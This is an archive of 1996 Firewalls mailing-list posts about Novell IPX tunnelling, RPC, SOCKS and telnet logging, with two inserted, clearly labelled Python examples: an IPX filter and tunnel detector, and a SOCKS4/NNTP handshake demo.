** On Tue, 6 Feb 1996, Prakash N Purushotham wrote:
**
** >
** > Is there any way I can configure telnetd to log the client's
** > IP Address, the login id used, time stamps in syslog?
** >
**
** How about using TCP Wrappers !
**
** Mohammed Ali.
**

From firewalls-owner Tue Feb 6 10:38:47 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24830 for firewalls-outgoing; Tue, 6 Feb 1996 10:12:40 -0800 (PST)
Received: from pcslink.com (pcslink.com [206.43.160.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24825 for ; Tue, 6 Feb 1996 10:12:37 -0800 (PST)
Received: from ryan (ryan.pcslink.com [206.43.161.41]) by pcslink.com (8.6.12/8.6.12) with SMTP id LAA15564 for ; Tue, 6 Feb 1996 11:11:47 -0700
Message-ID: <3117992D.3D89@pcslink.com>
Date: Tue, 06 Feb 1996 11:08:45 -0700
From: Ryan Mooney
X-Mailer: Mozilla 2.0b6a (WinNT; I)
MIME-Version: 1.0
To: Firewalls@GreatCircle.COM
Subject: Re: Novell inside IP Port?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

According to the Novell docs that I have read, NetWare IP, IP relay and IP tunnel all run on 213/udp (Yuck - udp). Basically I would filter anything from/to that port. Also you could put all the Novell machines on their own subnet with a router (oh, say something like KarlBridge) in between and JUST allow IPX across that wall. That is a lot better IMNSHO than just filtering what Novell tells you they use (OK so I don't believe everything I read ;)

If security is a real issue I would also have a policy that denies inbound anything except to pre-approved machines that have well known and well controlled services. Of course that's just firewalls 101 and you probably knew that already....

> Is there known TCP/UDP port(s) that support the
> tunneling of Novell inside IP? Someone recently set up
> such a tunnel and exposed all our Novell Servers to the
> Internet. I would like to prevent this from happening
> in the future.
From firewalls-owner Tue Feb 6 11:00:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA24132 for firewalls-outgoing; Tue, 6 Feb 1996 09:56:26 -0800 (PST)
Received: from uu9.psi.com (uu9.psi.com [38.145.107.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA24127 for ; Tue, 6 Feb 1996 09:56:21 -0800 (PST)
Received: from infosys.inf.COM by uu9.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; id AA08985 for firewalls@GreatCircle.COM; Tue, 6 Feb 96 12:55:10 -0500
Received: by Inf.COM (4.1/SMI-4.1) id AA06155; Tue, 6 Feb 96 12:52:22 EST
Received: from unknown(204.4.59.106) by infosys.inf.COM via smap (V1.3) id sma006142; Tue Feb 6 12:52:17 1996
Received: from cc:Mail by smtp_gw.inf.com id AA823601570; 06 Feb 95 10:34:29 EST
Date: 06 Feb 95 10:34:29 EST
From: "SATEESHB"
Message-Id: <9601068236.AA823601570@smtp_gw.inf.com>
To: firewalls@GreatCircle.COM, "Richard Giering Jr."
Subject: Re: RPC Across a firewall?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

1. RPC runs on TCP also.
3. Why is RPC insecure? Any discussion on this topic would be of help to us.

sateesh.

______________________________ Reply Separator _________________________________
Subject: RPC Across a firewall?
Author: "Richard Giering Jr." at SMTP_GW
Date: 2/5/96 5:58 PM

I know the kind of reaction I'm liable to get but I said I'd check into it.... We have developers who are writing apps based upon RPC and demanding that RPC be opened on the firewall. The idea is to enable users with their own Internet provider to be able to access internal applications using RPC/client-server apps. I have some concerns listed below. Can anyone think of any more?

1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms
2) RPC and portmapper are hard if not impossible to proxy.
3) RPC is insecure
4) portmapper has many known security holes.
My reaction has been "if they want to dialup, we'll setup internal modems". Is anyone aware of firewall products that allow and protect RPC?

Rick Giering, Firewall Ranger
CCH Inc.

From firewalls-owner Tue Feb 6 11:09:32 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA25921 for firewalls-outgoing; Tue, 6 Feb 1996 10:35:00 -0800 (PST)
Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA25916 for ; Tue, 6 Feb 1996 10:34:54 -0800 (PST)
Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 13:34:14 EST
Received: from relay4.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 19:50:41 EST
Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQaarj24144; Mon, 29 Jan 1996 19:46:18 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA23905 for firewalls-outgoing; Mon, 29 Jan 1996 13:48:36 -0800 (PST)
Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA23900 for ; Mon, 29 Jan 1996 13:48:32 -0800 (PST)
Received: from East.Sun.COM by mercury.Sun.COM (Sun.COM) id NAA02134; Mon, 29 Jan 1996 13:47:28 -0800
Received: from congress.East.Sun.COM by East.Sun.COM (5.x/SMI-5.3) id AA18018; Mon, 29 Jan 1996 16:47:21 -0500
Received: from traveller.East.Sun.COM by congress.East.Sun.COM (4.1/SMI-4.1) id AA29802; Mon, 29 Jan 96 16:47:09 EST
Received: by traveller.East.Sun.COM (SMI-8.6/SMI-SVR4) id QAA06214; Mon, 29 Jan 1996 16:47:11 -0500
Date: Mon, 29 Jan 1996 16:47:11 -0500
From: giff@congress.East.Sun.COM (Wayne Gifford - Internet Commerce Group)
Message-ID: <199601292147.QAA06214@traveller.East.Sun.COM>
To: Firewalls@GreatCircle.COM
Subject: Most Secure Unix?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

There are no secure UNIXes, only security conscious administrators

giff

Wayne Gifford - Dr. SunScreen        giff@east.sun.com
Sun Internet Commerce Group          Phone 703-716-6426
2100 Reston Parkway                  Phax 703-620-1244
Reston VA, 22091

From firewalls-owner Tue Feb 6 11:27:09 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA25942 for firewalls-outgoing; Tue, 6 Feb 1996 10:35:23 -0800 (PST)
Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA25934 for ; Tue, 6 Feb 1996 10:35:15 -0800 (PST)
Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 13:34:18 EST
Received: from relay7.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 19:58:51 EST
Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP id QQaarj22334; Mon, 29 Jan 1996 19:50:29 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA00677 for firewalls-outgoing; Mon, 29 Jan 1996 15:50:24 -0800 (PST)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA00672 for ; Mon, 29 Jan 1996 15:50:21 -0800 (PST)
Received: from maestro.Maestro.COM by relay5.UU.NET with SMTP id QQaarf06863; Mon, 29 Jan 1996 18:49:14 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA02510; Mon, 29 Jan 96 18:38:49 EST
Date: Mon, 29 Jan 1996 18:38:48 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Re: Desktop tools needed
Message-ID:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ah would like to say Thank You to all those great d00ds who provided pointers to kewl tewlz and also those folks who pointed out there are legitimate utilities. Ah get so carried away with sniffing and cracking that Ah often forgit there is legal ways to do things.
Hence-forth, by popular vote, Professor Patch, Dalmation Nation shall be known as Hack Dawgie Dawg. Thanks also to those whose grey matter provided original names, especially Mark. Sick Puppy, the Cat_Eating_Dawg the Church of the Dead Meow From firewalls-owner Tue Feb 6 11:38:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA27234 for firewalls-outgoing; Tue, 6 Feb 1996 11:06:42 -0800 (PST) Received: from esl-hub.demon.co.uk (esl-hub.demon.co.uk [158.152.8.209]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA27072 for ; Tue, 6 Feb 1996 11:03:26 -0800 (PST) Path: esl.tex.com!dbuckley From: dbuckley@esl.tex.com (David Buckley) Subject: Re: Internet-access from Novell References: <14223c_20@gaitor.tex.com> To: firewalls@greatcircle.com Message-ID: <823657988snx@esl.tex.com> X-Mailer: cppnews $Revision: 1.41 $ Date: Tue, 06 Feb 96 18:53:08 GMT Organization: Electric Solutions Ltd Lines: 96 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <14223c_20@gaitor.tex.com> you write: > Here's the worse problem I mentioned. > > I've grepped over 9000 archived articles of this group > and found no mention of how to firewall novell boxes from > each other. I have a client in the financial industry who > has a market data feed from a provider. The market data feed > is provided by a novell server on a leased line, with special > client software for the users. How do I protect said client > from, say, a disgruntled mailroom employee at the provider end, > bent on hacking on the clients network? Whoa! Let's slow down here. Firstly, you're in the wrong area. You need novell experts, not networking experts, 'cos (and I'm a network professional slinging bricks from within my glass house here) most networking folk consider themselves 'above' IPX, and don't like the thought of that horrible stuff polluting their nice IP networks. Nextly, Novell is in general orders of magnitude safer than the IP world. 
Don't Panic! There are two sorts of 'accesses' folks commonly talk about in reference to Novell, NetWare, or IPX/SPX: 1: NCP - this is the 'normal' mode of operation of a client workstation logging into a fileserver, for file and print services. This uses IPX as its underlying transport. 2: IPX not involving NCP or SPX - these are essentially a peer to peer service, which only involves a fileserver if the fileserver happens to be one of the peers involved. An example of this would be NetWare for SAA, which is an IBM 3270 gateway that happens to run on a fileserver platform, as opposed to being stand alone on a non-fileserver box. Firstly, NCP: Clients access servers, not the other way round, so access to a server can't compromise a client workstation's files directly. This means the worst your disgruntled mailroom employee can do is destroy the feeding fileserver. Obviously, he could alter a .BAT or .EXE to wreak havoc on a client, but as this .EXE or .BAT has legitimately been accessed by the client, it's impossible(ish) to guard against by normal firewall tricks. > I'm not even sure what novell uses in lieu of tcp/udp ports; > pointers to IPX/SPX docs, and the Novell equivalent of > an /etc/services file would be most appreciated. IPX is roughly equal to UDP SPX is roughly equal to TCP There is no /etc/services in the Novell world. The nearest is the lists published on the net of what the various sockets have been found to do. Novell hold but don't publish the official list. If you run IP on a fileserver, you do have a sys:etc/services file, a program called INETD.NLM, and it works identically to the unix variant. Products like FLeX/IP, NFS Gateway fit the bill of IP on a server. >> Are there any IPX/SPX packet filters available? Yes; almost all routers can filter IPX/SPX, and novell themselves do a filter set (called MultiProtocol router) that runs right on the fileserver. A low-cost effective standalone firewall is the karlBridge, commercial version. 
>> Are there any IPX proxy server firewalls available? Not of which I am aware. >> CJC from Novell mentioned their existence, but gave little other info. >> Of course I'll start by recommending that the market data feed box go >> onto its own ethernet segment, and that IP traffic is not forwarded on >> or off of that segment. To give a reasoned argument I need more detail. I spend my days in the City of London, looking after large multiprotocol networks in financial houses, so should be able to give you an exact answer. Specifically, what does the leased line connect to, a router, the back of the fileserver, an application gateway etc? What's the name of the service - I may have been thru this one already... (and you may wish to mail me the reply as well, 'cos I don't always have time to read firewalls...) -- ----------------------------------------+------------------------------------ David Buckley of Electric Solutions Ltd | Email: dbuckley@esl.tex.com Services to the Computing,Electronics | and Entertainment industries. 
| ----------------------------------------------------------------------------- From firewalls-owner Tue Feb 6 12:42:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA01539 for firewalls-outgoing; Tue, 6 Feb 1996 12:26:08 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA01532 for ; Tue, 6 Feb 1996 12:26:03 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 15:25:24 EST Received: from relay4.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 05 Feb 1996 19:33:42 EST Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQabrd28384; Mon, 5 Feb 1996 19:20:32 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26046 for firewalls-outgoing; Mon, 5 Feb 1996 11:46:49 -0800 (PST) Received: from syr.edu (syr.EDU [128.230.1.49]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26041 for ; Mon, 5 Feb 1996 11:46:44 -0800 (PST) Received: from syru4-109.syr.EDU by syr.edu (8.6.9/CNS) id OAA11093; Mon, 5 Feb 1996 14:46:21 -0500 Message-ID: <3116889F.5FCF@syr.edu> Date: Mon, 05 Feb 1996 14:45:51 -0800 From: Peter Morrissey To: Firewalls@GreatCircle.COM Subject: Novell inside IP Port? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are there known TCP/UDP port(s) that support the tunneling of Novell inside IP? Someone recently set up such a tunnel and exposed all our Novell Servers to the Internet. I would like to prevent this from happening in the future. 
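Added example, not code from Buckley, Morrissey or Novell: a small Python IPX header parser, a stateless filter policy of the kind Buckley describes (only NCP replies from the known feed server get into the client's network; SAP, RIP and anything else from the provider's side is dropped), and a detector for Morrissey's case, IPX carried inside UDP. The well-known socket numbers (NCP 0x0451, SAP 0x0452, RIP 0x0453), the NCP packet type 17 and IANA's "ipx" port 213 come from outside the thread; the client network number, the feed server's node address and the sample packets are constructed for the example. The tunnel check matches on the IPX header inside the UDP payload rather than on the port, because a tunnel set up by an insider can use any port.

```python
"""IPX header parsing, a stateless IPX filter policy, and an IPX-in-UDP
tunnel detector. Added example; not from the mailing-list posts."""
import struct

IPX_HDR_LEN = 30
# Well-known IPX sockets (Novell never published an official list;
# these values are widely documented).
NCP_SOCKET = 0x0451      # NetWare Core Protocol: file and print
SAP_SOCKET = 0x0452      # Service Advertising Protocol
RIP_SOCKET = 0x0453      # IPX routing information
NCP_PACKET_TYPE = 17     # IPX "packet type" field value used by NCP
SAP_PACKET_TYPE = 4      # PEP, used by SAP
IANA_IPX_PORT = 213      # IANA "ipx" service; a tunnel may use any port

# Assumed site values (constructed for this example)
CLIENT_NET = 0x0000AB01                 # client's IPX network number
FEED_SERVER_NODE = "00001b123456"       # MAC of the provider's feed server


def parse_ipx(pkt: bytes):
    """Return the IPX header fields, or None if pkt is not a plausible IPX packet."""
    if len(pkt) < IPX_HDR_LEN:
        return None
    checksum, length, tc, ptype = struct.unpack(">HHBB", pkt[:6])
    dnet, dnode, dsock, snet, snode, ssock = struct.unpack(">I6sHI6sH", pkt[6:30])
    # IPX normally carries 0xFFFF ("no checksum"); length covers header + data.
    if checksum != 0xFFFF or length < IPX_HDR_LEN or length > len(pkt):
        return None
    return {"type": ptype, "hops": tc & 0x0F,
            "dst_net": dnet, "dst_node": dnode.hex(), "dst_sock": dsock,
            "src_net": snet, "src_node": snode.hex(), "src_sock": ssock}


def build_ipx(dst_net, dst_node, dst_sock, src_net, src_node, src_sock,
              payload=b"", ptype=NCP_PACKET_TYPE):
    """Assemble an IPX packet (used here only to construct sample traffic)."""
    hdr = struct.pack(">HHBB", 0xFFFF, IPX_HDR_LEN + len(payload), 0, ptype)
    hdr += struct.pack(">I6sH", dst_net, bytes.fromhex(dst_node), dst_sock)
    hdr += struct.pack(">I6sH", src_net, bytes.fromhex(src_node), src_sock)
    return hdr + payload


def filter_from_feed(pkt: bytes) -> str:
    """Policy for packets arriving from the provider's segment: only NCP
    replies from the known feed server to a client-side (dynamic, >= 0x4000)
    socket on the client network pass; SAP/RIP/anything else is dropped."""
    h = parse_ipx(pkt)
    if h is None:
        return "drop: not ipx"
    if h["src_node"] != FEED_SERVER_NODE:
        return "drop: unknown source node"
    if (h["src_sock"] == NCP_SOCKET and h["dst_net"] == CLIENT_NET
            and h["dst_sock"] >= 0x4000):
        return "allow: ncp reply"
    return "drop: socket 0x%04x->0x%04x" % (h["src_sock"], h["dst_sock"])


def ipx_in_udp(udp_dport: int, udp_payload: bytes):
    """Flag a UDP datagram whose payload parses as IPX, whether or not it uses
    the IANA port; returns (reason, header) or None."""
    h = parse_ipx(udp_payload)
    if h is None:
        return None
    why = "iana ipx port" if udp_dport == IANA_IPX_PORT else "ipx header in payload"
    return why, h


if __name__ == "__main__":
    reply = build_ipx(CLIENT_NET, "0000c0ffee01", 0x4003,
                      0x0000FEED, FEED_SERVER_NODE, NCP_SOCKET, b"\x33\x33")
    print(filter_from_feed(reply), ipx_in_udp(40000, reply)[0])
```

The checksum/length test in parse_ipx is a heuristic, good enough to spot a tunnel carrying real NetWare traffic; a filter on a real border should also pin the UDP source and destination hosts, since nothing stops an attacker from hand-crafting a datagram that fails the test.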
From firewalls-owner Tue Feb 6 13:38:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04802 for firewalls-outgoing; Tue, 6 Feb 1996 13:36:19 -0800 (PST) Received: from chrivb01.cch.com (chrivb01.cch.com [199.14.11.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA04797 for ; Tue, 6 Feb 1996 13:36:14 -0800 (PST) Received: by chrivb01.cch.com id AA20841; Tue, 6 Feb 96 15:35:19 CST Received: from mailhub.cch.com(165.181.21.17) by chrivb01 via smap (V1.3mjr) id sma020835; Tue Feb 6 15:35:05 1996 Received: by notes.cch.com (IBM OS/2 SENDMAIL VERSION 1.3.14/1.0) id AA6289; Tue, 06 Feb 96 15:36:58 -0600 Message-Id: <9602062136.AA6289@notes.cch.com> Received: from Computax with "Lotus Notes Mail Gateway for SMTP" id 72523663028188FA862562C8007596D5; Tue, 6 Feb 96 15:36:58 To: firewalls From: "Richard Giering Jr." Date: 6 Feb 96 15:33:51 Subject: RE: RPC Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks for the responses; both on the list and by direct Email. You all provided very good information and I'll be contacting some of those that offered. (blush) Some things I should've known without you having to tell me (like RPC can run over TCP). Now getting the developers to code that way will be interesting. They tend to think they know best even when they don't. Before I embarrass myself again, are there any references that you guys/gals could suggest? Thanks again. Rick Giering CCH Inc. 
From firewalls-owner Tue Feb 6 14:10:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA06435 for firewalls-outgoing; Tue, 6 Feb 1996 14:06:05 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA06402 for ; Tue, 6 Feb 1996 14:05:53 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 17:04:38 EST Received: from relay4.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 15:19:27 EST Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQaaqq17285; Mon, 29 Jan 1996 15:02:25 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA00468 for firewalls-outgoing; Mon, 29 Jan 1996 07:18:06 -0800 (PST) Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA00460 for ; Mon, 29 Jan 1996 07:18:02 -0800 (PST) Received: by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.17) via UUCP id AA00148 ; Mon, 29 Jan 96 10:16:51 -0500 Received: (from bisley@localhost) by sb.lanier.com (8.6.12/8.6.6) id KAA01302 for firewalls@greatcircle.com; Mon, 29 Jan 1996 10:19:19 -0500 From: Brad Isley Message-ID: <199601291519.KAA01302@sb.lanier.com> Subject: Re: USE OF 'MANAGED' INTERNET CONNECTION To: firewalls@greatcircle.com Date: Mon, 29 Jan 1996 10:19:18 -0500 (EST) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > unless the ISP is bonded I wouldnt even think of trusting my ISP to watch > me. What is preferable instead is a 3rd 'expert trusted" party > to watch both my isp and intruders. An ISP if broken into and most usually > are is NOT in a position to administer site security.. Every ISP > I have seen is totally clueless in this respect. I have used services from two providers in Atlanta which not only have clues, but even knew when they were cracked. 
Then they tracked the sukka down and plugged the hole. Were they cracked without knowing? Probably. Would I trust them? No. But it's not so bleak as some may think. They both are quite knowledgeable about security and take it seriously. From firewalls-owner Tue Feb 6 14:47:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07210 for firewalls-outgoing; Tue, 6 Feb 1996 14:29:01 -0800 (PST) Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA07205 for ; Tue, 6 Feb 1996 14:28:55 -0800 (PST) Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA03687; Tue, 6 Feb 1996 15:15:18 -0600 Date: Tue, 6 Feb 1996 15:15:18 -0600 From: Sten Drescher Message-Id: <199602062115.PAA03687@grendel.texas.net> To: smithj@rd.qms.com (John Smith) CC: Firewalls@GreatCircle.COM In-reply-to: smithj@rd.qms.com's message of Tue, 6 Feb 96 07:54:56 CST Subject: Re: Socks and Internet News References: <9602061354.AA01952@joker.rd.qms.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk smithj@rd.qms.com (John Smith) said: JS> Is there a way to safely tunnel NNTP through SOCKS? Since I'm JS> having to 'experiment' on our running firewall I want to make sure JS> I get it right without opening 10k new holes. Thanks for any JS> advice. Well, NNTP is a tcp connection, so if you use a newsreader compiled with SOCKS, you shouldn't have any problems. When I was behind a SOCKS firewall, I used emacs Gnus. Initially I just used a SOCKSified tcp.c, and later SOCKSified emacs itself. -- #include /* Sten Drescher */ Unsolicited email advertisements will be proofread for a US$100/page fee. 
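Added example, not Drescher's or Smith's code and not any SOCKS library's: the exchange a SOCKSified newsreader goes through, in Python, with both sides shown. The client sends a SOCKS4 CONNECT request (VN=4, CD=1, port, IPv4 address, user ID, NUL) and requires the 8-byte "granted" reply (VN=0, CD=90) before speaking NNTP on the same connection. A fake proxy-plus-news-server thread stands in for the firewall so that the whole thing runs offline over a socketpair; it also shows the check a firewall admin wants in place, granting only an allowed user ID to the news server on port 119 and rejecting anything else with code 91. The user IDs, the news server address 192.0.2.10, the newsgroup and the NNTP replies are constructed.

```python
"""SOCKS4 CONNECT handshake carrying an NNTP session, client and proxy
sides. Added example; not from the list posts or any SOCKS library."""
import socket
import struct
import threading

SOCKS4_VERSION = 4
SOCKS4_CONNECT = 1
SOCKS4_GRANTED = 90      # 0x5A
SOCKS4_REJECTED = 91     # 0x5B
NNTP_PORT = 119

# Constructed policy for the fake proxy (assumed values)
NEWS_SERVER_IP = "192.0.2.10"
ALLOWED_USERS = {"smithj", "stend"}


def recv_exact(sock, n):
    """Read exactly n bytes or raise; recv() may return short reads."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during SOCKS handshake")
        buf += chunk
    return buf


def build_connect_request(dst_ip, dst_port, userid):
    # VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID... NUL
    return (struct.pack(">BBH4s", SOCKS4_VERSION, SOCKS4_CONNECT, dst_port,
                        socket.inet_aton(dst_ip))
            + userid.encode("ascii") + b"\x00")


def read_connect_request(sock):
    vn, cd, port, ip = struct.unpack(">BBH4s", recv_exact(sock, 8))
    userid = b""
    while True:
        c = recv_exact(sock, 1)
        if c == b"\x00":
            break
        userid += c
    return vn, cd, port, socket.inet_ntoa(ip), userid.decode("ascii", "replace")


def socks4_connect(sock, dst_ip, dst_port, userid):
    """Client side: send CONNECT and require a 'granted' reply (VN=0, CD=90)."""
    sock.sendall(build_connect_request(dst_ip, dst_port, userid))
    vn, cd, _port, _ip = struct.unpack(">BBH4s", recv_exact(sock, 8))
    if vn != 0 or cd != SOCKS4_GRANTED:
        raise PermissionError("SOCKS4 proxy refused CONNECT, code %d" % cd)


def fake_proxy_and_news_server(sock):
    """Proxy side (constructed stand-in for the firewall): grant only an
    allowed user ID connecting to the news server on 119, then play a
    minimal NNTP server on the granted connection."""
    vn, cd, port, ip, userid = read_connect_request(sock)
    ok = (vn == SOCKS4_VERSION and cd == SOCKS4_CONNECT
          and userid in ALLOWED_USERS and ip == NEWS_SERVER_IP and port == NNTP_PORT)
    sock.sendall(struct.pack(">BBH4s", 0, SOCKS4_GRANTED if ok else SOCKS4_REJECTED,
                             port, socket.inet_aton(ip)))
    if ok:
        f = sock.makefile("rb")
        sock.sendall(b"200 news.example.net NNRP server ready (posting ok)\r\n")
        line = f.readline().rstrip(b"\r\n")
        if line.upper().startswith(b"GROUP "):
            sock.sendall(b"211 42 1 42 " + line.split(b" ", 1)[1] + b"\r\n")
        else:
            sock.sendall(b"500 command not recognized\r\n")
        f.readline()                        # QUIT
        sock.sendall(b"205 closing connection\r\n")
    sock.close()


def fetch_group_over_socks(group, userid, dst_ip=NEWS_SERVER_IP, dst_port=NNTP_PORT):
    """One SOCKSified NNTP session against the fake proxy over a socketpair.
    Returns (greeting, GROUP reply); raises PermissionError if the proxy refuses."""
    client, proxy = socket.socketpair()
    t = threading.Thread(target=fake_proxy_and_news_server, args=(proxy,))
    t.start()
    try:
        socks4_connect(client, dst_ip, dst_port, userid)
        f = client.makefile("rb")
        greeting = f.readline().decode().strip()
        client.sendall(b"GROUP " + group.encode("ascii") + b"\r\n")
        reply = f.readline().decode().strip()
        client.sendall(b"QUIT\r\n")
        f.readline()
        return greeting, reply
    finally:
        client.close()
        t.join()


if __name__ == "__main__":
    print(fetch_group_over_socks("comp.security.firewalls", "smithj"))
```

The point Smith was worried about sits in the proxy's `ok` test: a SOCKS server that grants CONNECT to any destination turns the firewall into an open relay, so the allowed (user, host, port) triple is the whole policy. The SOCKS4 user ID is not authenticated, which is why real deployments pair it with source-address rules or use a proxy with real authentication.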
From firewalls-owner Tue Feb 6 14:53:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07537 for firewalls-outgoing; Tue, 6 Feb 1996 14:41:01 -0800 (PST) Received: from mail.telstra.com.au (mail.telstra.com.au [192.148.160.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA07525 for ; Tue, 6 Feb 1996 14:40:55 -0800 (PST) Received: from mail_gw.fwall.telecom.com.au(192.148.147.10) by mail via smap (V1.3) id sma012380; Wed Feb 7 03:12:32 1996 Received: from cdn_mail.dn.itg.telecom.com.au(144.135.109.134) by mail_gw.telecom.com.au via smap (V1.3) id sma008898; Wed Feb 7 09:34:41 1996 Received: from cednsw.telecom.com.au. (cede.telecom.com.au [144.132.122.196]) by cdn_mail.dn.itg.telecom.com.au (8.6.11/8.6.9) with ESMTP id JAA12787 for ; Wed, 7 Feb 1996 09:34:41 +1100 Received: (from bwa@localhost) by cednsw.telecom.com.au. (8.6.11/8.6.9) id JAA18385 for firewalls@greatcircle.com; Wed, 7 Feb 1996 09:34:35 +1100 Date: Wed, 7 Feb 1996 09:34:35 +1100 From: Barry Anderson Message-Id: <199602062234.JAA18385@cednsw.telecom.com.au.> To: firewalls@greatcircle.com Subject: MAIL LOOP!!! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk atlanta.net. Lurve them Vaxen... 
cheers, Barry From firewalls-owner Tue Feb 6 15:08:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07738 for firewalls-outgoing; Tue, 6 Feb 1996 14:46:11 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA07732 for ; Tue, 6 Feb 1996 14:46:06 -0800 (PST) Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQabup11120; Tue, 6 Feb 1996 17:45:24 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA29248; Tue, 6 Feb 96 17:34:34 EST Date: Tue, 6 Feb 1996 17:34:31 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Follow up on Windows 95/NT trying to use firewall DNS Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The shop I was watching where PC's running Windows 95 and Windows NT were trying to unsuccessfully look up NetBios names in the firewall DNS appears to have solved their problem. As I understand it, they used sniffers to determine which machines were connecting to Unix hosts on port 137 and 138, then went to each one of those Windows machines in turn and under Network, Network Bindings, turned off everything except TCP/IP. Of course this won't be a fix if you are running multiple protocols. Now some d00d just sent me mail asking "Has anyone ever told you ... that your weird." Sure. My mom. And everyone who has seen my Sunday morning ritual of drilling holes in water melons and coconuts, and then eating them, in memory of Jeffrey Dahmer. If ah was ritch, ah would be called eccentric, not weird. But then ah is not totally eccentric. Ah would NEVER sniff someone's rear without first asking their permission, because that's not polite among MaNimals. 
